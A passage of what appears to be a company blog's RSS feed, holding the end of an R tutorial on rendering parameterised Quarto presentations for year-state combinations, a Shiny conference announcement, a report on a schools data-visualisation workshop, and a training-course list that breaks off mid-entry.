new run, you can just update your YAML file.&lt;/p&gt;
&lt;p&gt;Your YAML file would look something like:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-yaml" data-lang="yaml"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# in params.yml&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;year&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2020&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#6e7681"&gt;&lt;/span&gt;&lt;span style="color:#7ee787"&gt;state&lt;/span&gt;:&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#39;Alabama&amp;#39;&lt;/span&gt;&lt;span style="color:#6e7681"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and then, to render:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;quarto render slides.qmd --execute-params params.yml
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="rendering-multiple-parameter-combinations-at-once"&gt;Rendering multiple parameter combinations at once&lt;/h3&gt;
&lt;p&gt;Being able to render a presentation with different parameters is useful.
But let’s say you needed a single presentation for each combination of
state and year. You’d end up needing to manually render 250 separate
presentations. So, we want to automate rendering multiple combinations
of parameters at once.&lt;/p&gt;
&lt;p&gt;Instead of rendering 250 files, let’s take a sample of 3 states and 2
years, so we’ll end up with 6 presentations in total. We then create a
tibble of the year-state combinations we want to generate presentations
for:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;years &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unique&lt;/span&gt;(ufo_sightings&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;year)[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;2&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;states &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;unique&lt;/span&gt;(ufo_sightings&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;state_name)[1&lt;span style="color:#ff7b72;font-weight:bold"&gt;:&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;params &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; tidyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;crossing&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; year &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; years,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; state &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; states
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;params
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can then either build a &lt;code&gt;for&lt;/code&gt; loop or use the
&lt;a href="https://purrr.tidyverse.org/" rel="external"&gt;{purrr}&lt;/a&gt; package to iterate over the
state-year combinations. If you want to learn more about iteration,
check out our &lt;a href="https://www.jumpingrivers.com/training/course/r-programming-functions-looping-conditionals/" rel="external"&gt;Programming with
R&lt;/a&gt;
and our &lt;a href="https://www.jumpingrivers.com/training/course/r-tidyverse-programming-purrr-lists/" rel="external"&gt;Functional Programming with
purrr&lt;/a&gt;
courses.&lt;/p&gt;
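&lt;p&gt;If you go down the &lt;code&gt;for&lt;/code&gt; loop route, a rough sketch could look like the following. The function name &lt;code&gt;render_combinations()&lt;/code&gt; and its &lt;code&gt;render_fun&lt;/code&gt; argument are our own illustration: the argument defaults to &lt;code&gt;quarto::quarto_render()&lt;/code&gt; but can be swapped for a stand-in, so the loop can be tried without rendering anything. The rest of this post uses {purrr} instead.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Sketch of the for-loop alternative (hypothetical helper, not from the post).
# `combos` is a data frame with one row per year-state combination.
render_combinations = function(combos, render_fun = quarto::quarto_render) {
  for (i in seq_len(nrow(combos))) {
    render_fun(
      input = "slides.qmd",
      execute_params = list(
        year = combos$year[i],
        state = combos$state[i]
      ),
      # Include the parameters in the file name to tell the outputs apart
      output_file = paste0(combos$state[i], "_", combos$year[i], ".html")
    )
  }
  invisible(combos)
}

# Small example grid of combinations
combos = expand.grid(
  year = c(2021, 2022),
  state = c("Michigan", "Ohio"),
  stringsAsFactors = FALSE
)

# Dry run: report what would be rendered instead of calling Quarto
render_combinations(
  combos,
  render_fun = function(input, execute_params, output_file) {
    message("Would render ", output_file)
  }
)
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Calling &lt;code&gt;render_combinations(combos)&lt;/code&gt; without the second argument would hand each row to &lt;code&gt;quarto::quarto_render()&lt;/code&gt;.&lt;/p&gt;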
&lt;p&gt;Here, we’re using the &lt;code&gt;walk2()&lt;/code&gt; function from &lt;code&gt;{purrr}&lt;/code&gt; to iterate over
the different year-state combinations to create multiple files. The
&lt;code&gt;walk2()&lt;/code&gt; function lets you iterate over two inputs simultaneously and
is used when your function has a &lt;em&gt;side effect&lt;/em&gt;, such as writing a file,
rather than wanting the output returned as an R object.&lt;/p&gt;
&lt;p&gt;We also include our input parameters in the output file name to allow us
to distinguish between the multiple output files:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;purrr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;walk2&lt;/span&gt;(params&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;year, params&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;state, &lt;span style="color:#ff7b72;font-weight:bold"&gt;~&lt;/span&gt;quarto&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;quarto_render&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; input &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;slides.qmd&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; execute_params &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;year&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; .x,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;state&amp;#34;&lt;/span&gt; &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; .y),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output_file &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; glue&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;glue&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;{.y}_{.x}.html&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Running this command, you end up with 6 aptly named output files:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot of file list showing the files Michigan_2021.html, Michigan_2022.html, North Carolina_2021.html, North Carolina_2022.html, Ohio_2021.html, Ohio_2022.html" height="auto" id="h-rh-i-2" src="https://www.jumpingrivers.com/blog/r-parameterised-presentations-quarto/multiple-parameters.png" width="752"&gt;&lt;/p&gt;
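&lt;p&gt;Note that state names containing spaces, such as North Carolina, carry those spaces into the file name. If that is a problem for your hosting or scripts, one option is to build the name with a small helper. This is only a sketch, and &lt;code&gt;slide_file_name()&lt;/code&gt; is a hypothetical name of our own rather than something provided by Quarto or {glue}.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical helper: build a lower-case file name without spaces
slide_file_name = function(state, year) {
  # Replace each run of characters other than a-z and 0-9 with a hyphen
  slug = gsub("[^a-z0-9]+", "-", tolower(state))
  paste0(slug, "_", year, ".html")
}

slide_file_name("North Carolina", 2021)
# returns "north-carolina_2021.html"
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;In the &lt;code&gt;walk2()&lt;/code&gt; call above, this would replace the {glue} expression with &lt;code&gt;output_file = slide_file_name(.y, .x)&lt;/code&gt;.&lt;/p&gt;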
&lt;p&gt;And there you have it! Generating multiple presentations or reports at
once is a fairly straightforward process when using Quarto to render
your outputs. You can of course extend this logic and create much more
in-depth reports or presentations with different kinds of outputs,
including text summaries, which depend on input parameters.&lt;/p&gt;
&lt;p&gt;To see the full code behind this blog post, as well as some further
examples in a more fleshed out Quarto report, check out the &lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/2023-r-parameterised-presentations-quarto" rel="external"&gt;blogs repo
on our
GitHub&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-parameterised-presentations-quarto/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2023</title><link>https://www.jumpingrivers.com/blog/shiny-in-production-2023-conference-r-workshops/</link><pubDate>Tue, 18 Jul 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-in-production-2023-conference-r-workshops/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2023-conference-r-workshops/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-in-production-2023-conference-r-workshops/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;With the early bird deadline approaching, we thought now would be a great time to tell you a bit more about what to expect at this year&amp;rsquo;s &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production&lt;/a&gt;!&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-shiny-in-production-2023-conference-r-workshops"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;p&gt;As with last year&amp;rsquo;s conference, SIP2023 will take place over a day and a half at the &lt;a href="https://www.thecatalystnewcastle.co.uk/" rel="external"&gt;Catalyst&lt;/a&gt; in Newcastle upon Tyne, UK. The first day (Thursday 12th October) will consist of three parallel workshops, followed by a drinks reception in the evening, which is a great opportunity for networking and debriefing from the day&amp;rsquo;s learning.&lt;/p&gt;
&lt;p&gt;The second day (Friday 13th October) will be full of talks from speakers across industry, covering all things Shiny and other web-based R tools. If you want more of an idea of what to expect, check out the &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKJ6Un06aThcKJC7eQMSgKRD" rel="external"&gt;playlist of talks&lt;/a&gt; from last year&amp;rsquo;s conference.&lt;/p&gt;
&lt;p&gt;So far this year we have announced 3 of our invited speakers, and we are currently reviewing the submissions from the recent call for abstracts. The line-up so far is:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.linkedin.com/in/anna-skrzydlo/" rel="external"&gt;Anna Skrzydło&lt;/a&gt; (&lt;a href="https://appsilon.com/" rel="external"&gt;Appsilon&lt;/a&gt;) - &lt;em&gt;3 reasons why nobody uses your app&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.linkedin.com/in/george-w-stagg/" rel="external"&gt;George Stagg&lt;/a&gt; (&lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;) - &lt;em&gt;Title TBC&lt;/em&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.linkedin.com/in/cararthompson/" rel="external"&gt;Cara Thompson&lt;/a&gt; (&lt;a href="https://www.cararthompson.com/" rel="external"&gt;Freelance data consultant&lt;/a&gt;) - &lt;em&gt;Dynamic annotations: tips and tricks to make text shine without stealing the show&lt;/em&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-in-production-2023-conference-r-workshops/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Changing the world with Data: An outreach event</title><link>https://www.jumpingrivers.com/blog/speakers-for-schools-data-science-outreach-event-r-shiny-data-visualisation/</link><pubDate>Thu, 06 Jul 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/speakers-for-schools-data-science-outreach-event-r-shiny-data-visualisation/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/speakers-for-schools-data-science-outreach-event-r-shiny-data-visualisation/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/speakers-for-schools-data-science-outreach-event-r-shiny-data-visualisation/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Earlier this year, two data scientists from Jumping Rivers ran an outreach activity for 14-19 year olds across the UK, in collaboration with the youth charity &lt;a href="https://www.speakersforschools.org/" rel="external"&gt;Speakers for Schools&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The three-hour workshop focussed on how to create visualisations that are both visually appealing and useful to the viewer. We demonstrated this with a few visualisations built from questions we asked at sign-up (attendees&amp;rsquo; favourite fast food restaurants and snacks), and showed some examples that challenge the view that data visualisation is all bar charts and scatter plots - think football pundit analysis and tube maps!&lt;/p&gt;
&lt;img src="taste-change.png" alt="Bar chart of sweet vs savoury snacks" style="width: 600px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;The session culminated with us turning the tables - we became the clients, specifically, two biologists, recently returned from their studies of some penguin species in Antarctica! We asked them to design a dashboard to help us explore all of the data we had collected.&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-speakers-for-schools-data-science-outreach-event"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;/p&gt;
&lt;p&gt;Those of you familiar with the R programming language will probably recognise the reason for this particular leap in professions. The {&lt;a href="https://allisonhorst.github.io/palmerpenguins/" rel="external"&gt;palmerpenguins&lt;/a&gt;} package, originally published in 2020 by Allison Marie Horst, Alison Presmanes Hill and Kristen B. Gorman, is an excellent resource for teaching data exploration and visualisation! It even comes with some adorable artwork that you can download to help.&lt;/p&gt;
&lt;figure&gt;
&lt;img src="penguins.png" alt="Cartoon of three types of penguin, Chinstrap, Gentoo and Adelie" style="width: 600px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;figcaption&gt;Artwork by @allison_horst&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;p&gt;We developed a Shiny app that attendees could access from their browsers and use to create their own visualisations of the penguin data. They could change the size, shape and colour of the points based on the data, play around with the axes, colour palettes and themes, add customised labels, split the plot by year, or add a line of fit. There was a lot to keep them busy!&lt;/p&gt;
&lt;p&gt;We wanted to include enough options to make the plots fully customisable, while also giving attendees the opportunity to make something truly awful, if they wanted, to demonstrate some dos and don&amp;rsquo;ts of data visualisation.&lt;/p&gt;
&lt;img src="penguin-app.png" alt="Screenshot of Shiny App that gives plotting options for the penguins data to build a visualisation." style="width: 800px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;While we can&amp;rsquo;t share the creations here, we were very impressed with the creativity that we saw throughout the whole workshop. The collaborative whiteboards were well used for introductions via the medium of sketched visualisations!&lt;/p&gt;
&lt;p&gt;We hope that the attendees of this workshop enjoyed themselves as much as we did! If you&amp;rsquo;re interested in learning how to make great visualisations, or how to create Shiny apps, take a look at our &lt;a href="https://www.jumpingrivers.com/training/all-courses/" rel="external"&gt;course page&lt;/a&gt;. We offer courses on visualisation in &lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/" rel="external"&gt;R&lt;/a&gt; and &lt;a href="https://www.jumpingrivers.com/training/course/python-matplotlib-seaborn-visualisation/" rel="external"&gt;Python&lt;/a&gt;, as well as a variety of courses on Shiny, from an &lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-shiny-application-web/" rel="external"&gt;introduction for Shiny beginners&lt;/a&gt;, to more &lt;a href="https://www.jumpingrivers.com/training/course/advanced-shiny/" rel="external"&gt;advanced concepts&lt;/a&gt; and &lt;a href="https://www.jumpingrivers.com/training/course/web-accessibility-in-shiny/" rel="external"&gt;web accessibility&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/speakers-for-schools-data-science-outreach-event-r-shiny-data-visualisation/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>July Training Update</title><link>https://www.jumpingrivers.com/blog/july-training-update-python-r-quarto-git-sql/</link><pubDate>Tue, 04 Jul 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/july-training-update-python-r-quarto-git-sql/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/july-training-update-python-r-quarto-git-sql/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/july-training-update-python-r-quarto-git-sql/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Embark on your programming odyssey with our extensive range of courses! Never written a line of code in your life? No stress - we offer a mix of introductory courses for beginners as well as more advanced courses for those looking to expand their knowledge further.&lt;/p&gt;
&lt;p&gt;Over the summer and autumn months, we will be offering training in the popular programming languages Python and R, plus additional courses on Quarto, Git and SQL.&lt;/p&gt;
&lt;p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Whether you want to start from scratch, or improve your skills, &lt;a href="https://www.jumpingrivers.com/training/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-july-training-update"&gt;Jumping Rivers has a training course for you&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;/p&gt;
&lt;h3 id="r"&gt;R&lt;/h3&gt;
&lt;p&gt;We have something for everyone with our R courses, whether it&amp;rsquo;s statistical modelling and machine learning you&amp;rsquo;re after, or data visualisation with {ggplot2} and {shiny}.&lt;/p&gt;
&lt;h4 id="statistical-modelling-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-statistics-modelling-linear-regression-clustering/" rel="external"&gt;Statistical Modelling with R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 17th July 2023 &lt;strong&gt;(DEADLINE 10th July)&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;From the very beginning, R was designed for statistical modelling. Out of the box, R makes standard statistical techniques easy. &lt;a href="https://www.jumpingrivers.com/training/course/r-statistics-modelling-linear-regression-clustering/" rel="external"&gt;This course&lt;/a&gt; covers the fundamental modelling techniques. We begin the day by revising hypothesis tests, before moving on to ANOVA tables and regression analysis. The class ends by looking at more sophisticated methods such as clustering and principal components analysis (PCA).&lt;/p&gt;
&lt;h4 id="data-visualisation-with-ggplot2"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/" rel="external"&gt;Data Visualisation with ggplot2&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 4th September 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Want to learn how to effectively visualise your data in R using the elegant {ggplot2} package? With {ggplot2} it’s easy to customise everything from plot layouts and themes to scales, colours, and more! &lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/" rel="external"&gt;This course&lt;/a&gt; will comprehensively take you through basic plot types such as bar and line charts as well as cover more advanced topics such as interactive graphics with {plotly}.&lt;/p&gt;
&lt;h4 id="spatial-data-analysis-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-spatial-analysis-sf-tmap-leaflet/" rel="external"&gt;Spatial Data Analysis with R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 18th September 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;As spatial data sets get larger, more sophisticated software needs to be harnessed for their analysis. R is now a widely used open source software platform for working with spatial data thanks to its powerful analysis and visualisation packages. The focus of &lt;a href="https://www.jumpingrivers.com/training/course/r-spatial-analysis-sf-tmap-leaflet/" rel="external"&gt;this course&lt;/a&gt; is providing participants with the understanding needed to apply R’s powerful suite of geographical tools to their own problems.&lt;/p&gt;
&lt;h4 id="introduction-to-shiny"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-shiny-application-web/" rel="external"&gt;Introduction to Shiny&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 2nd October 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Do you want to provide interactive visualisation and data exploration features for users who do not have R and data science skills? &lt;a href="https://www.jumpingrivers.com/training/course/r-introduction-shiny-application-web/" rel="external"&gt;Discover how easy it can be&lt;/a&gt; to use R and {shiny} to create your own apps and dashboards for exploring data without relying on web development or external BI tools. We will show you various examples of input widgets and outputs to display tables and visualisations.&lt;/p&gt;
&lt;h4 id="time-series-analysis-with-r"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-time-series-prediction-arima/" rel="external"&gt;Time Series Analysis with R&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 30th October 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Predicting the future is a tough problem. Time series analysis makes it possible to assess whether or not predictions are possible and, if they are, to build a model which can generate informed predictions for the future with realistic estimates of uncertainty. &lt;a href="https://www.jumpingrivers.com/training/course/r-time-series-prediction-arima/" rel="external"&gt;This training course&lt;/a&gt; will introduce participants to the packages in the &lt;a href="https://tidyverts.org/" rel="external"&gt;Tidyverts&lt;/a&gt; ecosystem.&lt;/p&gt;
&lt;h4 id="building-an-r-package"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-package-documentation-roxygen2/" rel="external"&gt;Building an R Package&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Advanced&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 1st November 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;This is a &lt;a href="https://www.jumpingrivers.com/training/course/r-package-documentation-roxygen2/" rel="external"&gt;one-day intensive course&lt;/a&gt; on building a package in R. The focus will be on getting a working R package ready for distribution. This includes automating package setup and consistent package structure with {usethis}. You will be able to use the {testthat} workflow to create tests for packages.&lt;/p&gt;
&lt;h4 id="machine-learning-with-tidymodels"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-analytics-machine-learning-tidymodels/" rel="external"&gt;Machine Learning with Tidymodels&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 6th November 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Machine learning is the process of applying statistical techniques to gain systematic information about a quantity of interest. &lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-analytics-machine-learning-tidymodels/" rel="external"&gt;We will be specifically focusing&lt;/a&gt; on how we can use the {tidymodels} suite of packages to implement these techniques. We cover key reasons for model fitting, such as prediction and inference, on quantitative and qualitative responses.&lt;/p&gt;
&lt;h4 id="advanced-machine-learning-with-tidymodels"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-tidymodels-lda-pre-processing-tree-based-models/" rel="external"&gt;Advanced Machine Learning with Tidymodels&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Advanced&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 8th November 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;This course builds on the material covered in our &lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-analytics-machine-learning-tidymodels" rel="external"&gt;Machine Learning with Tidymodels&lt;/a&gt; course. We look at fitting linear discriminant analysis (LDA) models using {discrim}, assessing model reliability with V-fold cross-validation, pre-processing, tree-based models and more. If you wish to explore the abundance of model fitting techniques {tidymodels} has to offer, then &lt;a href="https://www.jumpingrivers.com/training/course/r-prediction-inference-tidymodels-lda-pre-processing-tree-based-models/" rel="external"&gt;this course&lt;/a&gt; is certainly for you!&lt;/p&gt;
&lt;h3 id="python"&gt;Python&lt;/h3&gt;
&lt;p&gt;With our Python courses, you will start from programming basics and work your way up to data visualisation and machine learning.&lt;/p&gt;
&lt;h4 id="introduction-to-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-introduction-visualisation-manipulation/" rel="external"&gt;Introduction to Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Foundation&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 7th August 2023&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Python is a general-purpose programming language popular among data scientists and statisticians. In &lt;a href="https://www.jumpingrivers.com/training/course/python-introduction-visualisation-manipulation/" rel="external"&gt;this one-day introductory course&lt;/a&gt;, participants will learn to import, summarise and visualise their data. At each step, we avoid using “magic code”, and stress the importance of understanding what Python is doing.&lt;/p&gt;
&lt;h4 id="programming-with-python"&gt;&lt;a href="https://www.jumpingrivers.com/training/course/python-programming-control-flow-functions/" rel="external"&gt;Programming with Python&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;&lt;strong&gt;Course Level: Intermediate&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Next course date: 21st August 2023&lt;/em&gt;&lt;/p&gt;
